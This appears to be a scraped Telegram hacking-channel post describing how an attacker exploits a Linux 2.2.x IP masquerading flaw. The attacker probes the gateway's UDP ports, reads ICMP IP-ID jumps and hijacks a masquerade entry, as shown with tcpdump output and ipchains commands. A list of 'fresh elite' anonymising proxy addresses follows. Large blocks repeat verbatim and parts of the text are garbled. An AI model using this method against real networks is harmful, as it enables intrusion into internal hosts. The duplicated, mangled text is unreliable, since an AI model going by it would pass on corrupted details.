β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Security kernel IP camouflage has security holes :
t.me/UndercodeTesting
1) There are serious security vulnerabilities in the IP camouflage implementation of Linux system 2.2.x kernel. There is a lack of serious inspection of the connection in the relevant core code. The attacker can rewrite the UDP disguise entry in the core so that the attacker's UDP packet can be routed into the internal machine.
2) When an internal IP wants to access the DNS server of the external network, when the sent UDP packet passes through the IP masquerading gateway, the kernel will add an entry to record the connection. For example, a UDP packet connected from port 1035 of internal host A to port 53 of external host C. The kernel replaces the source address of this packet with the IP of the disguised gateway (B). Port, the default is from 61000 port to 65096 port, so in theory, the core can handle 4096 TCP / UDP camouflage connections at the same time.
>Host A: 1035-> GW B: 63767-> Host C: 53
π¦Security kernel IP camouflage has security holes :
t.me/UndercodeTesting
1) There are serious security vulnerabilities in the IP camouflage implementation of Linux system 2.2.x kernel. There is a lack of serious inspection of the connection in the relevant core code. The attacker can rewrite the UDP disguise entry in the core so that the attacker's UDP packet can be routed into the internal machine.
2) When an internal IP wants to access the DNS server of the external network, when the sent UDP packet passes through the IP masquerading gateway, the kernel will add an entry to record the connection. For example, a UDP packet connected from port 1035 of internal host A to port 53 of external host C. The kernel replaces the source address of this packet with the IP of the disguised gateway (B). Port, the default is from 61000 port to 65096 port, so in theory, the core can handle 4096 TCP / UDP camouflage connections at the same time.
>Host A: 1035-> GW B: 63767-> Host C: 53
π¦ HOW IT WORKS ?
When an external network sends a UDP packet to a disguised gateway, Linux IP disguise only decides whether this UDP packet should be forwarded to the internal network based on the target port. If the target port has a corresponding entry in the established camouflage connection table, it will update the source ip and source port in this packet to the remote host ip and port of the corresponding entry. As long as the attacker judges the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The port range used by the masquerade gateway to serve the masquerade connection is usually from 61000 to 65096, so it is easy for external attackers to determine which ports have been used to establish the connection. An attacker can send UDP detection packets to these ports disguised as a gateway, and then check the IP ID of the port's ICMP response packet. Each host sends a packet, the IP ID in its TCP / IP stack will increase by one. Therefore, the ICMP response sent to the port used for IP masquerading will have the IP ID of the internal host.
When an external network sends a UDP packet to a disguised gateway, Linux IP disguise only decides whether this UDP packet should be forwarded to the internal network based on the target port. If the target port has a corresponding entry in the established camouflage connection table, it will update the source ip and source port in this packet to the remote host ip and port of the corresponding entry. As long as the attacker judges the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The port range used by the masquerade gateway to serve the masquerade connection is usually from 61000 to 65096, so it is easy for external attackers to determine which ports have been used to establish the connection. An attacker can send UDP detection packets to these ports disguised as a gateway, and then check the IP ID of the port's ICMP response packet. Each host sends a packet, the IP ID in its TCP / IP stack will increase by one. Therefore, the ICMP response sent to the port used for IP masquerading will have the IP ID of the internal host.
π¦EXPLOITING .. This ID will usually be much different from the current IP ID of the gateway host, usually above 1000. The following example shows the process of exploiting weaknesses:
Host A is an internal host (192.168.1.100)
Host B is a disguised gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25).
Host X is an external attacker's IP (10.10.187.13)
. Before the detection, execute the command on the masquerade gateway: ipchains -L -M -n to display the current masquerade connection table Situation:
> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53
is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, the masquerading port is 63767
[from the attacker βs The result of tcpdump on the machine]
(To make it easier to see the problem, here we set the source port of all detection packets to 12345)
[Our detection will start from port 61000, we have omitted some of the previous results]
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] ( ttl 254, id 23069)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] ( ttl 254, id 23071)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)
Host A is an internal host (192.168.1.100)
Host B is a disguised gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25).
Host X is an external attacker's IP (10.10.187.13)
. Before the detection, execute the command on the masquerade gateway: ipchains -L -M -n to display the current masquerade connection table Situation:
> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53
is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, the masquerading port is 63767
[from the attacker βs The result of tcpdump on the machine]
(To make it easier to see the problem, here we set the source port of all detection packets to 12345)
[Our detection will start from port 61000, we have omitted some of the previous results]
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] ( ttl 254, id 23069)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] ( ttl 254, id 23071)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)
π¦ The ID of the above package is 17205, and the difference between it and 13139 has exceeded 4000, which means that we have found a pretended connection. !!!
10.10.187.13.12345> 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)
10.10.187.13.12345> 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)
10.10.187.13.12345> 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)
10.0.0.1> 10.10.187.13 : icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id
13142 ) 10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)
10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] ( ttl 254, id 23092)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)
[our detected end of port 65096, we have omitted some results]
now Let's check the situation of the masquerading connection table of the masquerading gateway:
ipchains -L -M -n
> UDP 04: 35.12 192.168.1.100 10.10.187.13 1035 (63767)-> 12345
You can see that the remote host has been replaced by an attack The ip of the attacker is 10.10.187.13, and the target port is also replaced by the source port used for attacker detection: 12345.
Now the attacker can send UDP data from the source port 12345 to port 1035 of the internal host.
-------------------------------------------------- ------------------------------
π¦Suggestion:
For the problem of accessing external DNS, a possible solution is to set it on the disguised gateway A cached domain name server, and then prohibit the disguise of UDP packets.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
10.10.187.13.12345> 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)
10.10.187.13.12345> 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)
10.10.187.13.12345> 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)
10.0.0.1> 10.10.187.13 : icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id
13142 ) 10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)
10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] ( ttl 254, id 23092)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)
[our detected end of port 65096, we have omitted some results]
now Let's check the situation of the masquerading connection table of the masquerading gateway:
ipchains -L -M -n
> UDP 04: 35.12 192.168.1.100 10.10.187.13 1035 (63767)-> 12345
You can see that the remote host has been replaced by an attack The ip of the attacker is 10.10.187.13, and the target port is also replaced by the source port used for attacker detection: 12345.
Now the attacker can send UDP data from the source port 12345 to port 1035 of the internal host.
-------------------------------------------------- ------------------------------
π¦Suggestion:
For the problem of accessing external DNS, a possible solution is to set it on the disguised gateway A cached domain name server, and then prohibit the disguise of UDP packets.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦FRESH ELITE PROXIES
187.65.203.245 80 1 hour ago
5854 ms 6% (74) br Brazil - Sao Jose Elite -
212.57.22.178 8080 1 hour ago
2440 ms 64% (60) tr Turkey Elite -
210.56.245.77 8080 1 hour ago
4203 ms 3% (76) au Australia Elite -
36.91.28.210 8080 1 hour ago
4595 ms 8% (68) id Indonesia Elite -
163.53.209.7 6666 1 hour ago
3799 ms 6% (53) in India - Modasa Elite -
95.38.14.3 8080 1 hour ago
3777 ms 21% (68) ir Iran Elite -
178.128.159.243 5836 1 hour ago
1466 ms 6% (68) gr Greece Elite -
163.204.241.112 9999 1 hour ago
2250 ms 2% (66) cn China Elite -
122.226.57.70 8888 1 hour ago
1019 ms 31% (59) cn China Elite -
95.216.203.174 3128 1 hour ago
531 ms 100% (8) ua Ukraine Elite -
85.10.219.98 1080 1 hour ago
4152 ms 45% (49) de Germany Elite -
77.94.144.164 3128 1 hour ago
3730 ms 10% (73) si Slovenia - Ljubljana Elite -
88.99.10.254 1080 1 hour ago
3187 ms 58% (57) de Germany Elite -
85.10.219.100 1080 1 hour ago
4056 ms 34% (57) de Germany Elite -
3.249.104.236 3128 1 hour ago
3634 ms 25% (58) ie Ireland - Dublin Elite -
82.119.170.106 8080 1 hour ago
556 ms 86% (56) de Germany - Berlin Elite -
64.225.112.121 8080 1 hour ago
2791 ms 29% (66) us United States - New York Elite -
5.59.145.129 8080 1 hour ago
4027 ms 10% (66) ru Russia - Novocherkassk Elite -
200.108.183.2 8080 1 hour ago
2548 ms 19% (70) uy Uruguay Elite -
151.233.202.31 8080 1 hour ago
2525 ms 7% (81) ir Iran Elite -
34.83.68.150 8080 1 hour ago
186 ms 6% (68) us United States Elite -
113.254.182.241 80 1 hour ago
822 ms 30% (55) hk Hong Kong - Central Elite -
103.209.64.19 6666 1 hour ago
3936 ms 10% (70) in India - Valsad Elite -
159.8.114.37 25 1 hour ago
411 ms 96% (47) fr France - Clichy Elite -
159.8.114.37 80 1 hour ago
847 ms 98% (38) fr France - Clichy Elite -
159.8.114.37 8123 1 hour ago
948 ms 91% (42) fr France - Clichy Elite -
34.87.96.183 8118 1 hour ago
2333 ms 10% (54) us United States Elite -
47.52.231.140 8080 1 hour ago
1663 ms 26% (51) hk Hong Kong Elite -
210.140.219.111 8080 1 hour ago
4336 ms 15% (63) jp Japan Elite -
46.235.53.26 3128 1 hour ago
1782 ms 36% (56) ru Russia - Moscow Elite -
195.170.15.66 8080 1 hour ago
4067 ms 14% (66) gr Greece Elite -
175.100.30.156 25 1 hour ago
4405 ms 14% (66) kh Cambodia Elite -
188.165.16.230 3129 1 hour ago
2565 ms 66% (43) pl Poland Elite -
102.67.19.132 8080 1 hour ago
4380 ms 10% (61) ng Nigeria - Lagos Elite -
103.240.161.109 6666 1 hour ago
4480 ms 8% (64) in India - Patan Elite -
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦FRESH ELITE PROXIES
187.65.203.245 80 1 hour ago
5854 ms 6% (74) br Brazil - Sao Jose Elite -
212.57.22.178 8080 1 hour ago
2440 ms 64% (60) tr Turkey Elite -
210.56.245.77 8080 1 hour ago
4203 ms 3% (76) au Australia Elite -
36.91.28.210 8080 1 hour ago
4595 ms 8% (68) id Indonesia Elite -
163.53.209.7 6666 1 hour ago
3799 ms 6% (53) in India - Modasa Elite -
95.38.14.3 8080 1 hour ago
3777 ms 21% (68) ir Iran Elite -
178.128.159.243 5836 1 hour ago
1466 ms 6% (68) gr Greece Elite -
163.204.241.112 9999 1 hour ago
2250 ms 2% (66) cn China Elite -
122.226.57.70 8888 1 hour ago
1019 ms 31% (59) cn China Elite -
95.216.203.174 3128 1 hour ago
531 ms 100% (8) ua Ukraine Elite -
85.10.219.98 1080 1 hour ago
4152 ms 45% (49) de Germany Elite -
77.94.144.164 3128 1 hour ago
3730 ms 10% (73) si Slovenia - Ljubljana Elite -
88.99.10.254 1080 1 hour ago
3187 ms 58% (57) de Germany Elite -
85.10.219.100 1080 1 hour ago
4056 ms 34% (57) de Germany Elite -
3.249.104.236 3128 1 hour ago
3634 ms 25% (58) ie Ireland - Dublin Elite -
82.119.170.106 8080 1 hour ago
556 ms 86% (56) de Germany - Berlin Elite -
64.225.112.121 8080 1 hour ago
2791 ms 29% (66) us United States - New York Elite -
5.59.145.129 8080 1 hour ago
4027 ms 10% (66) ru Russia - Novocherkassk Elite -
200.108.183.2 8080 1 hour ago
2548 ms 19% (70) uy Uruguay Elite -
151.233.202.31 8080 1 hour ago
2525 ms 7% (81) ir Iran Elite -
34.83.68.150 8080 1 hour ago
186 ms 6% (68) us United States Elite -
113.254.182.241 80 1 hour ago
822 ms 30% (55) hk Hong Kong - Central Elite -
103.209.64.19 6666 1 hour ago
3936 ms 10% (70) in India - Valsad Elite -
159.8.114.37 25 1 hour ago
411 ms 96% (47) fr France - Clichy Elite -
159.8.114.37 80 1 hour ago
847 ms 98% (38) fr France - Clichy Elite -
159.8.114.37 8123 1 hour ago
948 ms 91% (42) fr France - Clichy Elite -
34.87.96.183 8118 1 hour ago
2333 ms 10% (54) us United States Elite -
47.52.231.140 8080 1 hour ago
1663 ms 26% (51) hk Hong Kong Elite -
210.140.219.111 8080 1 hour ago
4336 ms 15% (63) jp Japan Elite -
46.235.53.26 3128 1 hour ago
1782 ms 36% (56) ru Russia - Moscow Elite -
195.170.15.66 8080 1 hour ago
4067 ms 14% (66) gr Greece Elite -
175.100.30.156 25 1 hour ago
4405 ms 14% (66) kh Cambodia Elite -
188.165.16.230 3129 1 hour ago
2565 ms 66% (43) pl Poland Elite -
102.67.19.132 8080 1 hour ago
4380 ms 10% (61) ng Nigeria - Lagos Elite -
103.240.161.109 6666 1 hour ago
4480 ms 8% (64) in India - Patan Elite -
β β β ο½ππ»βΊπ«Δπ¬πβ β β β